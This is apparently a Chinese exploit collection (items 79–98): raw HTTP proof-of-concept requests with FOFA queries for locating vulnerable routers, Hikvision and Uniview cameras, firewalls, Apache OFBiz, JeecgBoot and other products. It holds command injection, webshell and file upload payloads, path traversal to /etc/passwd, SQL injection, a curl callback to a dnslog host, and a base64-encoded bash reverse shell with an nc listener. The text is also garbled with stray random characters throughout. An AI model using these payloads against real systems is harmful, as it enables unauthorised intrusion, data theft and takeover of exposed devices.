/Applications/SkillDevelopAndEHS/
! E8 }4 H, j Z6 D( k------YsOxWxSvj1KyZow1PTsh98fdu6l--. g( Q! \1 v" s/ G
7 Q; [8 ~8 m) F( q1 H2 ?. M7 O8 u2 m: K/ G; |9 N
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
" X# C) {6 b0 m: IHost: x.x.x.x
: ]% q( d5 G) {7 X( D6 Y0 J* I8 q3 p u- {6 s2 P6 e
" E: o8 K) D' u W# h1 q2 W
79. BYTEVALUE 百为流控路由器远程命令执行
6 r! @4 @" k0 r5 b( tFOFA:BYTEVALUE 智能流控路由器
% F6 e j: O' e* i0 l. B9 |! n# s& C. D4 ]GET /goform/webRead/open/?path=|id HTTP/1.1
* A9 S1 L/ L1 p% c. ]" i! Q2 QHost:IP: E4 e. F4 y8 ~; D) l7 R& D9 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
, t7 N5 U/ z; C2 }/ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 Y( ^6 o/ w r8 w9 c0 V0 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 i: `0 F" c0 c
Accept-Encoding: gzip, deflate
' L6 ^8 W. s6 t( z6 n" q: ]Connection: close+ _. X1 E% |& ~2 x: r
Upgrade-Insecure-Requests: 16 l2 ~: M+ K% n# I, v) W2 C* i
5 h. r$ J! J7 ^" r
/ k& o/ b. d- e r4 T' A9 _$ r* [& a- `80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 D2 F! P: I9 P; i- l! K1 E
FOFA:app="速达软件-公司产品"
* o! ~4 H: y; [8 ~0 YPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
0 @$ ^* B# p* P- |3 aHost: x.x.x.x
1 i8 p; M! W; G8 {& w" W0 F, r/ B7 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 g4 z, q# O9 @8 X
Content-Length: 27' B1 a; ~5 @" s, ]1 \8 W7 E7 x7 d7 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% ?# a! Y4 i& Q" w$ A8 w$ GAccept-Encoding: gzip, deflate
( A# Z" H+ b3 g& rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ], S9 U: }5 m. ]& AConnection: close
) [$ W& T" Q: d! H# T# m8 TContent-Type: application/octet-stream2 |& V9 d) N. K( ]* y
Upgrade-Insecure-Requests: 1
* a! y0 G5 N: C! F7 o x- `& ]$ k( V8 S5 F
<% out.print("oessqeonylzaf");%> Z% ]! e9 i2 {" a9 c
0 q( |$ i3 @, c; O0 _
5 z6 v7 L1 L; R, xGET /xykqmfxpoas.jsp HTTP/1.1& N; w4 F2 Y% |; B$ s0 x
Host: x.x.x.x) U9 R$ P& H# K# N1 }. M5 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* n+ T/ z& o m+ ?Connection: close1 `* h7 ` W- r
Accept-Encoding: gzip
$ G" S" y0 k. m7 V/ I8 _4 F7 y) c# a. Z. W
+ C3 q3 ^7 Q3 z3 x+ `7 }0 V, V. _- o+ I0 M
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
7 x/ B9 h' O9 k" J6 q7 VFOFA:app="uniview-视频监控"
3 T" u4 _$ d% M" KGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
0 i/ F( ~/ y) R+ m nHost: x.x.x.x( ]: \: F+ }4 F0 _! I9 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 R4 R& w- p; u, V" \# c# D8 k) @Connection: close
" g! {# Q, S; FAccept-Encoding: gzip& \% a! i! g# G. \* O
& I) I* r) E9 ?, S7 b2 q
' D h. d- J' Q" Z3 B82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
. ?6 I3 P9 y( |FOFA:app="思福迪-LOGBASE". L+ w# j* p9 v( r/ O" a1 N
POST /bhost/test_qrcode_b HTTP/1.1$ v$ l; n/ J+ a* \
Host: BaseURL% @* y5 T! L. J* J) K
User-Agent: Go-http-client/1.1
3 Q" g1 r) [) q5 t: {: X4 g0 RContent-Length: 235 t: r5 J9 k) P6 p/ I/ R4 m2 G) _
Accept-Encoding: gzip4 \7 P5 j3 ^0 i# h( u4 w5 u
Connection: close& O& A0 q9 U+ O, c5 F% A& T0 F
Content-Type: application/x-www-form-urlencoded
; p) u! T' h# s3 mReferer: BaseURL7 Z, @5 L9 G- i' g
* {- |8 W' W* \4 ?' J
z1=1&z2="|id;"&z3=bhost% i* L+ e* C$ }1 i1 |
C3 {/ n9 P4 l
3 }% v7 s5 i% J: _$ Z
83. JeecgBoot testConnection 远程命令执行
% [, [: t. o$ \FOFA:title=="JeecgBoot 企业级低代码平台"6 Z: D! q4 @/ `, J2 C* |6 I. @
, ] a+ l: I3 ~/ g5 ]: ]2 x/ ]% Q, u9 c; x; m* W
POST /jmreport/testConnection HTTP/1.1. y5 A! G9 ^- b' r
Host: x.x.x.x+ p5 ~. {* W3 @* U- f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, s: j/ J" Z7 r: eConnection: close
9 \6 \! ^( n" e& ~& O6 P9 F) I) B, o SContent-Length: 8881
8 b. l O0 w! u, ~# | m1 }Accept-Encoding: gzip7 U( e0 U; R) f: L0 a2 L
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"% r, d; C: M d- y3 H* x
Content-Type: application/json8 ]; q: T/ Z, w# Z2 k% ~) Q
/ J& ~5 G+ ~% R. V+ I6 j
PAYLOAD
0 j0 _- `1 p3 l1 c- ]7 { |5 P
. `- _0 u' l0 }5 ^5 q2 u! Y4 c; H84. Jeecg-Boot JimuReport queryFieldBySql 模板注入: q8 R+ K- y @! K# U: e
FOFA:title=="JeecgBoot 企业级低代码平台"1 V& [. v& {9 C) g* ~! {
2 O, T' P) I* R3 [+ r6 t2 J
( c% Y7 ?# P- P B7 m0 _8 E8 k Q! Y
0 a2 V& `4 Z% \4 y) l! I3 W$ JPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
! w# D8 }4 b6 ~* g1 YHost: 192.168.40.130:8080: F* P$ D! \9 s1 y# v' h: `+ S! G
User-Agent: curl/7.88.1, e$ ?6 Y4 F+ R% b) B& w* Z
Content-Length: 1560 K A; M; z2 G# h3 x
Accept: */*, h& A/ G: _' [4 z2 \* B
Connection: close; U2 W2 Z+ u7 u* u1 z
Content-Type: application/json
& V* R! V4 b9 O" i9 F5 d7 iAccept-Encoding: gzip
' h# z6 \2 ^6 X8 V* a- W0 e5 s3 n; j" i- \" s' o. u5 @% X
{# f G P' I0 Z9 s& P
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
0 U1 c. u1 Q& Q; Y "type": "0"- h0 ~+ J2 A0 B3 g. J% v2 P
}, M, a$ _8 H# h! r9 l! h! d
; Y- `. q$ [7 O+ b+ h8 B1 q2 E+ }. L# D' j4 B9 I, C
85. SysAid On-premise< 23.3.36远程代码执行
b6 t5 ? g' P6 MCVE-2023-47246
5 k+ r. M8 _3 X: ZFOFA:body="sysaid-logo-dark-green.png" 9 l; a0 x+ ~& u" w7 l, }
EXP数据包如下,注入哥斯拉马
4 x$ d7 b* {8 W2 K& v1 o9 K* aPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
4 w9 i8 U4 H$ H3 P: [3 BHost: x.x.x.x+ U! T# v+ A+ l$ [. x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 G: T* ?( G& s* k5 F E# vContent-Type: application/octet-stream5 g+ b8 g [! u( k8 N' w
Accept-Encoding: gzip
/ \- @2 E; R, A% n+ V
: N+ l& ^& y6 B; x$ F7 rPAYLOAD- I4 k4 a# R) T/ F2 b& ^! {
2 @+ L. Q6 K: W* i1 O回显URL:http://x.x.x.x/userfiles/index.jsp
% T6 X) l- }) \+ i0 u& u" Q/ p" x$ T( ?- W3 n5 `
86. 日本tosei自助洗衣机RCE( ]8 _6 o! A7 I* d) Z7 O
FOFA:body="tosei_login_check.php"* g0 N- ^* w0 [+ i4 b' I
POST /cgi-bin/network_test.php HTTP/1.1
* z$ U# u( O3 m/ PHost: x.x.x.x
$ Y" i* _. [/ P% W* L% ~+ W2 ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
4 _4 `; j) D; UConnection: close
: K3 D @% E. o1 k m! Y& Y: AContent-Length: 44: U7 x4 o0 N* q; o2 u
Accept: */*
. e) i& r. b v; iAccept-Encoding: gzip) N. D3 T* [8 N! \7 y
Accept-Language: en# T2 n0 K7 |5 e0 Q+ R9 u7 E
Content-Type: application/x-www-form-urlencoded
: _" m" z3 e" w, P7 w" t$ x( C. T) {
host=%0acat${IFS}/etc/passwd%0a&command=ping
3 {; q& g, X" q* e' _, Y% ^1 o! ]8 s+ E
& F9 R+ w- n+ v% B87. 安恒明御安全网关aaa_local_web_preview文件上传9 q& E$ N% |/ W7 P6 P0 i
FOFA:title="明御安全网关"
9 K# r, i5 l4 i5 pPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" Z" A1 M5 i4 F# f! t/ q
Host: X.X.X.X& z( V) u/ x/ _* V* Q6 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 \ i% g; r4 E3 j/ Q1 d* i
Connection: close. X2 l0 @; i" N% G6 j
Content-Length: 198
2 e) ? c7 O7 mAccept-Encoding: gzip9 V% b- Z+ `" k! s0 d" m; U& F9 \
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
! {# b% W+ i0 C
0 T) M$ k. t) u" W! R% L/ c7 L--qqobiandqgawlxodfiisporjwravxtvd% r, v* K8 ]; s) f+ h. C0 j
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
' u% v+ h& ^0 r5 s' f1 r+ IContent-Type: text/plain
7 G0 |/ \$ e3 L' f
: N- h" |' A5 e4 h5 t0 d2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) J9 ?4 O4 w1 J) l--qqobiandqgawlxodfiisporjwravxtvd--$ g8 M% S6 u: V/ A, V0 I
) ?& q, @0 T, J5 E) f( ?7 ` ~9 Q% i6 _: }' N C
/jfhatuwe.php
8 h/ }3 Y1 C: s2 h! r5 t' ?1 T" e$ r: W8 U8 K# E
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
# _' P9 u& C$ q! O, cFOFA:title="明御安全网关"
, `$ q) n( ^2 mGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
: Q- Q( W2 a5 n# ]Host: x.x.x.xx.x.x.x
$ s$ w/ w! z+ z2 k' l" P* O5 P# FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, F+ R$ f/ E: Y- n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 A" O$ t7 Q8 ]( z( k
Accept-Encoding: gzip, deflate2 G. n [: V' ~' L: Y) r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* }2 ~" @& v# h3 B. Q7 X- VConnection: close0 a. {5 \- Q. G ^3 F$ j- ^
. f0 Y' V* v( n1 N8 s# r6 E& j. _5 w% z" N; _9 ]
/astdfkhl.php( M) n r9 p9 @, a, Z6 I# M, z
- E. T) t) o& ^0 [* T O/ a
89. 致远互联FE协作办公平台editflow_manager存在sql注入
" ?- R0 W. }) r7 JFOFA:title="FE协作办公平台" || body="li_plugins_download"
) B R. D# l1 q1 g0 C0 VPOST /sysform/003/editflow_manager.js%70 HTTP/1.1! I) Y* Q" j5 W0 ` u- |: l4 j
Host: x.x.x.x1 P& E9 z H! w* o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, U& ?$ Y$ P" g- t
Connection: close
2 e! e0 w7 H% J' ^! R- `Content-Length: 416 j0 J4 d) z( Y- f( g
Content-Type: application/x-www-form-urlencoded- V! Y/ e' `& `2 @# o& w
Accept-Encoding: gzip
" T, T" [0 \$ [; D" k) Y. c6 @+ F! r5 j$ d
option=2&GUID=-1'+union+select+111*222--+
! K, o, A4 C, b1 u, U/ Q" `: s7 p
3 n) S* j& F" Z) v90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行( i6 T2 m" r( x
FOFA:icon_hash="-1830859634"
# Q) \* T9 S! Q! P" z* V# V# g/ g$ @POST /php/ping.php HTTP/1.1
4 ^4 y& m8 [7 r* M$ a: h& G. V; T6 C( QHost: x.x.x.x4 p, W$ `9 X: b# U3 R1 c7 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/ L0 B& ~# X1 ?1 y4 w
Content-Length: 51$ L/ m, G0 \) \6 p- C
Accept: application/json, text/javascript, */*; q=0.013 }$ Y6 N8 s4 f6 {; L0 ^. ^$ m
Accept-Encoding: gzip, deflate8 l ^2 _9 Z# N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% R3 C e+ x( K Z& \ QConnection: close
- y, d A( ?( r; n0 P# eContent-Type: application/x-www-form-urlencoded
# C0 V p9 }: { T0 mX-Requested-With: XMLHttpRequest" U! n8 z3 {6 _) w) a0 i. h' t& e
, i9 \+ A. H8 w
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
7 A: b5 s6 z* b2 |+ J2 x; ^# J: |% l# n
# U% E7 c# u) V8 O5 w: c t- h91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ W' ?; q$ ~; EFOFA:title="综合安防管理平台"
9 i* E! X& v; W8 }GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1/ t7 {$ ~( \" p, Y/ [
Host: your-ip1 L" I6 a9 d) P" v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ u+ s0 e- P, M" k3 sAccept-Encoding: gzip, deflate& y- k9 c, V. P I
Accept: */*. u! u+ [( u, v, p
Connection: keep-alive+ W; J5 j7 K" U0 M+ k
# p! Y3 W' @5 k# d. `5 _& s- \; H4 K2 b2 F
% I& L! f( A8 {. e- ]6 R92. 海康威视运行管理中心session命令执行7 {4 x) {5 ~3 B3 a
Fastjson命令执行+ x# N/ i3 D+ R6 Z
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"- m a- D+ T0 F# l& Z$ V5 W7 l7 P& f
POST /center/api/session HTTP/1.16 J5 i q) q" e0 w" I! |( W
Host:6 b1 r8 B+ N( d+ T1 \
Accept: application/json, text/plain, */*5 h$ D5 w8 x8 Z5 A- i
Accept-Encoding: gzip, deflate j d" l% }, r8 l6 g" @, C( R
X-Requested-With: XMLHttpRequest
% X5 h4 `- o1 \* i) S; dContent-Type: application/json;charset=UTF-8
- g5 i E' S# K2 TX-Language-Type: zh_CN
* \: z7 u& o" {2 Q# ITestcmd: echo test
% ^; c0 h& e, ~ S$ {- ?, cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 j9 F. J5 x$ @2 O' \) R0 hAccept-Language: zh-CN,zh;q=0.9
1 @: D# ?6 q- _Content-Length: 5778
4 R: ~) ~6 m4 t2 y+ d
) S1 o" E( L8 iPAYLOAD
( _# |* Q$ Y! O" J/ N" @: r3 h+ { T" s4 ?4 B8 V
4 x( a. H& s% L$ u' E5 l93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) h; C8 j- t2 ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="' H. i! y2 n! R* {# L: h
POST /?g=app_av_import_save HTTP/1.1
: C8 N! @: A6 rHost: x.x.x.x. z8 i4 [2 T- Y3 S: |) W$ N9 p5 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
( w: B" k6 h% OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& T9 T @( S- z7 z* H
- b6 _: ^4 \5 f* Q! _" t------WebKitFormBoundarykcbkgdfx
9 T" f l) u2 vContent-Disposition: form-data; name="MAX_FILE_SIZE"
; y! ~6 g0 t/ h& t
2 a' G% }9 k" I+ b* b10000000
z( w. s7 x3 ~, n0 G6 i$ r6 s------WebKitFormBoundarykcbkgdfx" g6 n1 h0 {8 ~( Y8 X+ \( a- }1 N
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"# E, L3 m. d! [' M& z& U0 E8 o. Q! h
Content-Type: text/plain
4 b( O8 ]* m: Y$ T5 b/ o, ~- C2 p5 f& A4 a" G' V" F: K0 [
wagletqrkwrddkthtulxsqrphulnknxa( {; ^+ i( c# `! R; u
------WebKitFormBoundarykcbkgdfx
^( Y) K* p% K9 t: f/ [ fContent-Disposition: form-data; name="submit_post"
4 c1 y7 B; d% G6 K9 z' l
+ v( V9 F& q# A- K+ C O3 ~: q2 E1 Fobj_app_upfile
5 X' g0 J" z' y( R% F- s) A: r------WebKitFormBoundarykcbkgdfx; B$ v% _1 X, a/ T; N$ |3 ~
Content-Disposition: form-data; name="__hash__"' b8 S7 a, {2 @' R# e; ]. G5 D
5 _- l+ e+ p R# A: a+ Y% Y
0b9d6b1ab7479ab69d9f71b05e0e9445
- m/ @) V7 @5 o/ s/ |------WebKitFormBoundarykcbkgdfx--+ _8 ?5 ?; k: ], j- A2 w
7 j0 L+ \! j1 k, _4 V. k
9 @" R* k6 c/ u5 D: L: M. b# TGET /attachements/xlskxknxa.txt HTTP/1.1
9 }* b/ R4 u d) l; o; IHost: xx.xx.xx.xx) j# V! s: g+ _6 W5 N5 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, ~* n1 z2 o+ }; m
& }8 X! S* B& x1 T
8 E5 j( O( |* D5 _- e7 j* j94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
& y+ ~( Y% M' [3 g# n5 wFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
. r; r; U: N. X4 jPOST /?g=obj_area_import_save HTTP/1.1$ g; i2 }/ Y c! a6 ]' s6 ]1 o5 _
Host: x.x.x.x
: z' G4 Z2 Z# d4 x! k: X7 {! y5 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; z% |3 I: L J9 R3 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" [# Q$ V2 O ^! h9 E% x3 e; A
% J8 `0 e- Z, d& y& I------WebKitFormBoundarybqvzqvmt
! Z7 F5 f* e4 x6 M3 o2 o+ DContent-Disposition: form-data; name="MAX_FILE_SIZE"
* [) l6 \/ n* }" }# ~
6 G7 @, e( z4 p. z1 K" a! o10000000
4 S$ k5 k% C" u `- L* Y! G------WebKitFormBoundarybqvzqvmt
A2 T% Q# l$ dContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"# S" p7 c/ ~. } k. [( L; _
Content-Type: text/plain, Z7 I6 |8 s' T- P- } k
# ?' z$ z, g5 j- X
pxplitttsrjnyoafavcajwkvhxindhmu
0 ^" p( [! Y/ `) T------WebKitFormBoundarybqvzqvmt
6 i# t/ B) F [8 Q4 X9 AContent-Disposition: form-data; name="submit_post"
( k* t2 S* v) X' M' G- M5 i* l7 K, k- A# M
obj_app_upfile
3 C# s1 f0 @' v4 A% n------WebKitFormBoundarybqvzqvmt+ |( l% g* U1 g' g5 c$ b
Content-Disposition: form-data; name="__hash__"
& W8 p( O& s1 N+ V! m5 P- ?& l- y( x8 c' s8 l: a# f* z
0b9d6b1ab7479ab69d9f71b05e0e94450 {" y9 _' J3 \. b: C; v" a# m
------WebKitFormBoundarybqvzqvmt--+ ^( f: g+ C0 [" Y. f
: ~( j) ~6 I$ ^* _ \ X
" K, v' c0 a/ O" G! W
; V( C ?1 a" H4 z P' I
GET /attachements/xlskxknxa.txt HTTP/1.18 \) c* L/ X) M: M
Host: xx.xx.xx.xx& ~) A( }" S2 O' s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 f, b' K2 D) K; |& {( @0 g- e5 r
; j8 s4 b5 e6 E8 a" u' T3 ?. K* `/ U# v) F. S3 c5 a
' O( y$ y" N( }+ L
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
g0 P9 n2 {5 x* @CVE-2023-490705 X; @# A6 m6 t! v! {' E" c L
FOFA:app="Apache_OFBiz"
, q% m3 N9 w1 F$ D5 LPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.14 Y7 S* s. v: o- `- |% ^
Host: x.x.x.x9 N: A* ]. g7 l% `2 d+ K1 t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& p5 f- o6 x: k& w
Connection: close
2 O( K! [7 w/ h' ~- o4 e8 eContent-Length: 8891 J; g+ G2 G7 o- B2 n
Content-Type: application/xml
" v, ]6 O' b" c1 ^Accept-Encoding: gzip
4 ?- d/ A# x! Y/ n1 A4 a' d9 T% C* L/ z/ ~+ G
<?xml version="1.0"?>
, w& O' `3 {6 O5 [. v7 C4 e) u<methodCall>
' e$ j3 A) F; M0 e) j/ _ <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
2 ^4 \+ f/ ]1 b4 v5 [ <params>
& P( E4 E9 V# n4 Z3 ]7 u% O, J <param>& f6 A$ Q& R! |5 t5 s
<value>
5 O: Y6 R& \' X- V& q <struct>% N; m8 d# [3 v
<member>; S. k; O/ |. t# G8 X8 B; e
<name>test</name>
# Y7 q5 H* G+ _4 ~ <value>: Z2 P( D+ E" n9 n* \
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># C4 y4 }2 A( i8 C
</value>! }! _ M9 Y# C, {5 ^3 L
</member>) P, q' W, R# B9 {. Z9 C! K! ~
</struct>! x1 Y: J8 X. e. J
</value>3 f' z# Z7 D0 }7 M0 F
</param>
; B# J5 z( S' S( j8 h </params>% D6 p; x- L' l) m5 D& W7 i
</methodCall>
! y8 ~' w- ^- _/ Q4 Y/ q
3 o$ k% d' y8 y1 i4 r% H( s) ]( [" g' J+ M3 |7 c* P
用ysoserial生成payload
1 A, D. H0 d* r0 k8 x1 ~java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
) q: P8 u/ H1 P0 }, G4 q9 R! t6 p# b4 G8 v) f3 c$ W
2 Z8 ` s3 O% q% X将生成的payload替换到上面的POC
9 A& S2 \0 V% s8 R$ iPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: x" r: l( V1 H3 t4 h
Host: 192.168.40.130:8443 s" O" G2 d( ^& B' c3 l6 [1 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. q, F3 U+ k6 w; B" B
Connection: close
+ D' Z+ w8 J4 W" Z4 ^! wContent-Length: 889
1 }9 f# ~* A8 nContent-Type: application/xml
% G( [2 K5 P6 UAccept-Encoding: gzip
( r; h: W, e) v/ I; m2 D9 T7 L8 ~6 h
% E; L$ T3 _( YPAYLOAD
4 W6 z( ]) p5 g+ O+ {6 H
$ H+ e. G+ x! [& M- n& K$ |96. Apache OFBiz 18.12.11 groovy 远程代码执行0 G- t ^4 u' f" A) J! f& s
FOFA:app="Apache_OFBiz"4 Y" K: S$ v- z0 k# [6 p) v% A' k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
4 B9 A3 j7 q0 @' X7 R' @% ?* BHost: localhost:84432 x) G* M' A9 s, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; c0 o8 a! m+ v- N
Accept: */*
Z1 a' s4 U6 k5 b4 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 E1 G) H7 @) Q& v
Content-Type: application/x-www-form-urlencoded% K6 a3 S2 x1 u& u4 l2 u
Content-Length: 55: u7 K( N6 R' G$ f! `- z
5 l+ r x2 v* |& pgroovyProgram=throw+new+Exception('id'.execute().text);
# Q% ?5 B, Y. d! C/ Y
/ r" |$ F/ c1 J3 }! U9 `# A( D L Q( x4 g2 f; N8 B! R5 n' ^
反弹shell
* F+ n, S. Y6 p; e0 ]0 i在kali上启动一个监听
$ P* [; e8 p W t" @nc -lvp 7777
& z% U8 b n2 g) Q# o& `7 f9 F( l
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
. V3 H' _4 u* d6 U Z" CHost: 192.168.40.130:8443# D1 L8 d( O6 ~$ h2 v. y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( N8 I% T+ U& `. R3 e. H6 w' U
Accept: */*
0 y" [0 G8 |* S- ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) D$ x( |9 Q4 l# U
Content-Type: application/x-www-form-urlencoded
2 Y: G S5 X/ G V6 h3 P; T( w8 vContent-Length: 71
; M! U3 q- A: k3 V4 I$ S: n) p# g6 W" }' Y$ Y& W9 ]# z
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();0 p" L/ j' p' M( K' c, h9 z3 N% J$ C
* `# I' M$ D& _ _' m* `( m: ^7 T: O0 ^
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
E6 `7 ~; b3 z+ j, E: T6 R) L; ^" U/ sFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
+ P# p2 q6 o! B w) e- Q; wGET /passport/login/ HTTP/1.1
* L" U* x* W* v, hHost: 192.168.40.130:8085 L9 x1 _6 ]0 _2 h8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- A& v9 N% \9 [- o; U6 H( U
Accept-Encoding: gzip) M4 Y0 `5 d, c# H/ _2 G, l3 A7 I
Connection: close
$ ~% N9 K' G' G4 i& E/ V9 T7 B. fCookie: rememberMe=PAYLOAD
K3 p' C$ g, p- Z; _ D' LX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"5 ^1 Y6 \$ P7 o! D% W9 I: |
' A9 S: ?; h* x2 g4 E6 i7 j9 @
; x) J7 l- E/ L8 @/ q
98. SpiderFlow爬虫平台远程命令执行' E- k, b$ d) V9 m
CVE-2024-0195+ K7 N: L T4 t4 L2 U d. ^2 Q- p
FOFA:app="SpiderFlow"
) x. @+ m0 J5 K$ nPOST /function/save HTTP/1.1
9 \5 s+ a/ E/ hHost: 192.168.40.130:8088- G% e7 ~$ T0 j& E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. b6 h7 j% a3 }2 Q- C# M
Connection: close' q# E/ o: r# p+ {3 }! c
Content-Length: 1216 y+ y4 n; O. R$ I. N5 z- {
Accept: */*
# F0 s7 A3 f0 h. [. n2 V3 j3 UAccept-Encoding: gzip, deflate
